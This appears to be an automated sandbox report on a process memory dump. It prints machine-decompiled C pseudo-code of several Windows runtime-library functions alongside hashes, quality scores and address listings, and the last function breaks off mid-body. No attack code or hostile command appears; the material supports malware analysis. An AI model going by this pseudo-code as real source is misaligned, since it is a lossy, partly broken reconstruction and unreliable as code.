                                      0x053c6fc1
                                      0x053c6fc2
                                      0x053c6fd3
                                      0x053c6fd8
                                      0x053c6fd8
                                      0x053c6fdf
                                      0x053c6fe8
                                      0x053c6fee
                                      0x053c6fee
                                      0x053c6ff5
                                      0x053c6ffb
                                      0x053c6ffb
                                      0x053c7004
                                      0x00000000
                                      0x053c700a
                                      0x053c7004
                                      0x053c6eb3
                                      0x053c6e9c
                                      0x053c7015

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction ID: 1bdabd39a91f1be1b87b0b0829c7c262d0c2f3ad39f2a71a3ffceda0627f3073
                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction Fuzzy Hash: 7A715D71E00619AFCB11DFA9C984AEEBBB9FF48714F1045ADE905E7250DB34AE41CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053DB8D0, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 39%
                                      			E053DB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5437b9c; // 0x0
				_t124 = L05364620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05389800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E053895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E053895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L053677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05389910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E053895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5437b9c; // 0x0
									_t92 = L05364620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05389910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0534A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E053DE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E053DE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E053895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                      0x053db8d9
                                      0x053db8e4
                                      0x00000000
                                      0x053db8e6
                                      0x053db8f3
                                      0x053db8f5
                                      0x053db8f5
                                      0x053db8f8
                                      0x053db920
                                      0x053db924
                                      0x053db936
                                      0x053db939
                                      0x053db93d
                                      0x053db948
                                      0x053db9a0
                                      0x053db9a0
                                      0x053db9a4
                                      0x053db9bf
                                      0x053db9c4
                                      0x053db9c6
                                      0x053db9cd
                                      0x053db9d1
                                      0x053dbad4
                                      0x053dbad8
                                      0x053dbada
                                      0x053dbadc
                                      0x053dbadc
                                      0x053dbadf
                                      0x053dbae0
                                      0x053dbae2
                                      0x053dbae4
                                      0x053dbaec
                                      0x053dbaee
                                      0x053dbaf0
                                      0x053dbaf0
                                      0x053dbaec
                                      0x053dbafb
                                      0x053dbafc
                                      0x053dbafe
                                      0x053dbb01
                                      0x053dbb01
                                      0x00000000
                                      0x053dbb06
                                      0x053db9d7
                                      0x053db9db
                                      0x053db9db
                                      0x053db9de
                                      0x053db9de
                                      0x053db9e4
                                      0x053db9e7
                                      0x053db9ea
                                      0x053db9ec
                                      0x053db9ef
                                      0x053db9f3
                                      0x053dba1b
                                      0x053dba1b
                                      0x053dba23
                                      0x053dba24
                                      0x053dba27
                                      0x053dba2a
                                      0x053dba2b
                                      0x053dba2e
                                      0x053dba30
                                      0x053dba37
                                      0x053dba3f
                                      0x053dba9c
                                      0x053dbaa2
                                      0x053dbb13
                                      0x053dbb15
                                      0x053dbaae
                                      0x053dbaae
                                      0x053dbab3
                                      0x053dbab5
                                      0x053dbaba
                                      0x053dbac8
                                      0x053dbac8
                                      0x053dbaba
                                      0x053dbacd
                                      0x053dbacf
                                      0x00000000
                                      0x053dbacf
                                      0x053dbb1a
                                      0x00000000
                                      0x053dbb1c
                                      0x053dbaa7
                                      0x053dbb11
                                      0x00000000
                                      0x053dbb11
                                      0x053dbaa9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053dba41
                                      0x053dba41
                                      0x053dba41
                                      0x053dba58
                                      0x053dba5d
                                      0x053dba62
                                      0x00000000
                                      0x00000000
                                      0x053dba64
                                      0x053dba67
                                      0x053dba68
                                      0x053dba69
                                      0x053dba6c
                                      0x053dba6f
                                      0x053dba71
                                      0x053dba78
                                      0x053dba80
                                      0x00000000
                                      0x00000000
                                      0x053dba90
                                      0x053dba90
                                      0x053dba97
                                      0x00000000
                                      0x053dba97
                                      0x053db9f5
                                      0x053db9f7
                                      0x053db9f7
                                      0x053db9fa
                                      0x053dba03
                                      0x053dba07
                                      0x053dba0c
                                      0x053dba10
                                      0x053dba17
                                      0x00000000
                                      0x053db9f7
                                      0x053db9a6
                                      0x053db9a8
                                      0x053db9af
                                      0x053db9b3
                                      0x00000000
                                      0x00000000
                                      0x053db9b9
                                      0x00000000
                                      0x053db9b9
                                      0x053db94d
                                      0x053db98f
                                      0x053db995
                                      0x053db999
                                      0x053db960
                                      0x053db967
                                      0x053db968
                                      0x053db96a
                                      0x00000000
                                      0x053db96a
                                      0x053db99b
                                      0x053db99e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053db99e
                                      0x053db951
                                      0x053db954
                                      0x053db95a
                                      0x053db95e
                                      0x053db972
                                      0x053db979
                                      0x053db97d
                                      0x053db97f
                                      0x053db980
                                      0x053db982
                                      0x053db984
                                      0x00000000
                                      0x053db984
                                      0x00000000
                                      0x053db926
                                      0x00000000
                                      0x053db926

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d0a9dbf7c4aa11ad5962c7afd1f26cd5fc84cf2651fa81e9fb09e5b08cd2b7a
                                      • Instruction ID: 463ef2c914a93c4de7d2452ee20f59915a586cbc74985109ee165bca414f2a50
                                      • Opcode Fuzzy Hash: 5d0a9dbf7c4aa11ad5962c7afd1f26cd5fc84cf2651fa81e9fb09e5b08cd2b7a
                                      • Instruction Fuzzy Hash: 9871F073200701AFD722DF14D864F66F7F6FB44720F128528E6568B6A0DBB8E944CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053452A5, Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E053452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0535EEF0(0x54379a0);
					_t104 =  *0x5438210; // 0x3591e88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0535EB70(_t93, 0x54379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E05389890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0535EEF0(0x54379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0535EB70(0, 0x54379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3591e95
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0537F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0535EEF0(0x54379a0);
									__eflags =  *0x5438210 - _t104; // 0x3591e88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5438210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E053C4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0535EB70(_t95, 0x54379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E053895D0();
											L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E053895D0();
											L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0535EB70(_t93, 0x54379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E053895D0();
										L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E053895D0();
										L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0537F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                      0x053452a5
                                      0x053452ad
                                      0x053452b0
                                      0x053452b3
                                      0x053452b7
                                      0x053452ba
                                      0x053452bf
                                      0x053452c4
                                      0x053452cc
                                      0x00000000
                                      0x00000000
                                      0x053452ce
                                      0x053452d9
                                      0x053452dd
                                      0x053452e7
                                      0x053452f7
                                      0x053452f9
                                      0x053452fd
                                      0x053a0dcf
                                      0x053a0dd5
                                      0x053a0dd6
                                      0x053a0dd7
                                      0x053a0dd8
                                      0x053a0dd9
                                      0x053a0dde
                                      0x053a0ddf
                                      0x053a0de0
                                      0x053a0de1
                                      0x053a0de2
                                      0x053a0de5
                                      0x053a0dea
                                      0x053a0dec
                                      0x053a0f60
                                      0x053a0f64
                                      0x053a0f70
                                      0x053a0f76
                                      0x053a0f79
                                      0x053a0f79
                                      0x00000000
                                      0x053a0f64
                                      0x053a0df2
                                      0x053a0df7
                                      0x053a0e04
                                      0x053a0e0d
                                      0x053a0e0d
                                      0x053a0e10
                                      0x053a0e1a
                                      0x053a0e1c
                                      0x053a0e4c
                                      0x053a0e52
                                      0x053a0e61
                                      0x053a0e67
                                      0x053a0e6b
                                      0x053a0e70
                                      0x053a0e76
                                      0x053a0ed7
                                      0x053a0edc
                                      0x053a0ee0
                                      0x053a0ee6
                                      0x053a0eea
                                      0x053a0eed
                                      0x053a0ef0
                                      0x053a0ef3
                                      0x053a0ef6
                                      0x053a0ef9
                                      0x053a0efe
                                      0x053a0f01
                                      0x053a0f01
                                      0x053a0f0b
                                      0x053a0f12
                                      0x053a0f16
                                      0x053a0f18
                                      0x053a0f1b
                                      0x053a0f2c
                                      0x053a0f31
                                      0x053a0f31
                                      0x053a0f35
                                      0x053a0f39
                                      0x053a0f3a
                                      0x053a0f3c
                                      0x053a0f3f
                                      0x053a0f50
                                      0x053a0f55
                                      0x053a0f55
                                      0x053a0f59
                                      0x053452eb
                                      0x053452f1
                                      0x053452f1
                                      0x053a0e7d
                                      0x053a0e84
                                      0x053a0e88
                                      0x053a0e8a
                                      0x053a0e8d
                                      0x053a0e9e
                                      0x053a0ea3
                                      0x053a0ea3
                                      0x053a0ea7
                                      0x053a0eaf
                                      0x053a0eb3
                                      0x053a0eb9
                                      0x053a0eb9
                                      0x053a0ebc
                                      0x053a0ecd
                                      0x053a0ecd
                                      0x00000000
                                      0x053a0eb3
                                      0x053a0e21
                                      0x053a0e2b
                                      0x053a0e2f
                                      0x053a0e30
                                      0x053a0e3a
                                      0x053a0e3f
                                      0x053a0e41
                                      0x00000000
                                      0x00000000
                                      0x053a0e47
                                      0x00000000
                                      0x053a0e47
                                      0x053a0df9
                                      0x053a0dfe
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a0dfe
                                      0x05345303
                                      0x05345307
                                      0x00000000
                                      0x05345309
                                      0x00000000
                                      0x05345309
                                      0x05345307
                                      0x053452e9
                                      0x053452e9
                                      0x00000000
                                      0x053452e9
                                      0x0534530e
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d6f86971520c9aece39e0e1c7a9cafa64cd75cdf1995d42bee6f2cbd65dc2d3
                                      • Instruction ID: f0abe5cbdd2b01bd635b35cec2536194083a221b7d22986a89a92afe48b43bb5
                                      • Opcode Fuzzy Hash: 9d6f86971520c9aece39e0e1c7a9cafa64cd75cdf1995d42bee6f2cbd65dc2d3
                                      • Instruction Fuzzy Hash: 0951EE72209741ABD325EF64C849F27BBE9FF44720F10092EE4A583650E7B4E904DB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05372AE4, Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05372AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x5438204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x5438208; // 0x5438207
				_t8 = _t57 + 0x5438208; // 0x5438207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x5438450; // 0x3593e6c
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x543821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x5436d5c; // 0x7fcd0654
							_t72 =  *0x5436d5c; // 0x7fcd0654
							_t75 =  *0x5436d5c; // 0x7fcd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x5436d5c; // 0x7fcd0654
							_t84 =  *0x5436d5c; // 0x7fcd0654
							_t87 =  *0x5436d5c; // 0x7fcd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0538F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                      0x05372ae4
                                      0x05372aec
                                      0x05372aef
                                      0x05372af4
                                      0x05372af7
                                      0x05372afd
                                      0x05372b92
                                      0x05372b92
                                      0x05372b97
                                      0x05372b9c
                                      0x05372b9c
                                      0x05372b03
                                      0x05372b06
                                      0x05372b09
                                      0x05372b09
                                      0x05372b0f
                                      0x05372b15
                                      0x05372b15
                                      0x05372b1b
                                      0x05372b1e
                                      0x05372b21
                                      0x05372b26
                                      0x05372b29
                                      0x05372b81
                                      0x05372b84
                                      0x05372c0e
                                      0x05372c15
                                      0x05372c24
                                      0x05372c24
                                      0x05372b8a
                                      0x05372b8a
                                      0x05372b8a
                                      0x05372b8a
                                      0x05372b90
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05372b4a
                                      0x05372b4a
                                      0x05372b4d
                                      0x05372b53
                                      0x00000000
                                      0x00000000
                                      0x05372b55
                                      0x05372b58
                                      0x05372bb7
                                      0x053b5d1b
                                      0x053b5d37
                                      0x053b5d47
                                      0x053b5d53
                                      0x05372bbd
                                      0x05372bbd
                                      0x05372bbd
                                      0x05372bb7
                                      0x05372b5d
                                      0x05372c2f
                                      0x053b5d5b
                                      0x053b5d77
                                      0x053b5d87
                                      0x053b5d93
                                      0x05372c35
                                      0x05372c35
                                      0x05372c35
                                      0x05372c2f
                                      0x05372b65
                                      0x05372b9f
                                      0x05372ba2
                                      0x05372b67
                                      0x05372b67
                                      0x05372b69
                                      0x05372b6b
                                      0x05372b6e
                                      0x05372bc9
                                      0x05372bcc
                                      0x05372bcf
                                      0x05372bd4
                                      0x05372bd6
                                      0x05372bd6
                                      0x05372bdb
                                      0x05372c02
                                      0x05372c05
                                      0x05372c07
                                      0x00000000
                                      0x05372c07
                                      0x05372be0
                                      0x05372c00
                                      0x05372c3f
                                      0x05372c3f
                                      0x00000000
                                      0x05372c00
                                      0x05372be5
                                      0x05372be7
                                      0x05372bec
                                      0x05372bf4
                                      0x05372bf6
                                      0x00000000
                                      0x05372bf6
                                      0x05372b70
                                      0x05372b76
                                      0x05372b2b
                                      0x05372b2b
                                      0x05372b2d
                                      0x05372b2f
                                      0x05372b32
                                      0x05372b35
                                      0x05372b3a
                                      0x00000000
                                      0x05372b40
                                      0x05372b43
                                      0x05372b45
                                      0x05372b47
                                      0x05372b4a
                                      0x05372b4d
                                      0x05372b53
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05372b53
                                      0x05372b78
                                      0x05372b78
                                      0x05372b7b
                                      0x05372b7e
                                      0x00000000
                                      0x05372b7e
                                      0x05372b76
                                      0x05372ba5
                                      0x05372ba5
                                      0x05372ba8
                                      0x05372bad
                                      0x00000000
                                      0x00000000
                                      0x05372baf
                                      0x05372baf
                                      0x05372bc2
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2eb6879c1490f99bcba664811f563f6c654fb426fab9a8c0c42cafe1ef6126a
                                      • Instruction ID: e06615208851ca2e3d2a5aa6b3b82f46fe27b3a20dc8167a2f0d1a4c9c579161
                                      • Opcode Fuzzy Hash: b2eb6879c1490f99bcba664811f563f6c654fb426fab9a8c0c42cafe1ef6126a
                                      • Instruction Fuzzy Hash: AA51B77AE10129DFCB28CF1DC4809BEB7F6FB98700715855AF8469B724D738AA51CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540AE44, Relevance: .2, Instructions: 152COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0540AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0540C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0540ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
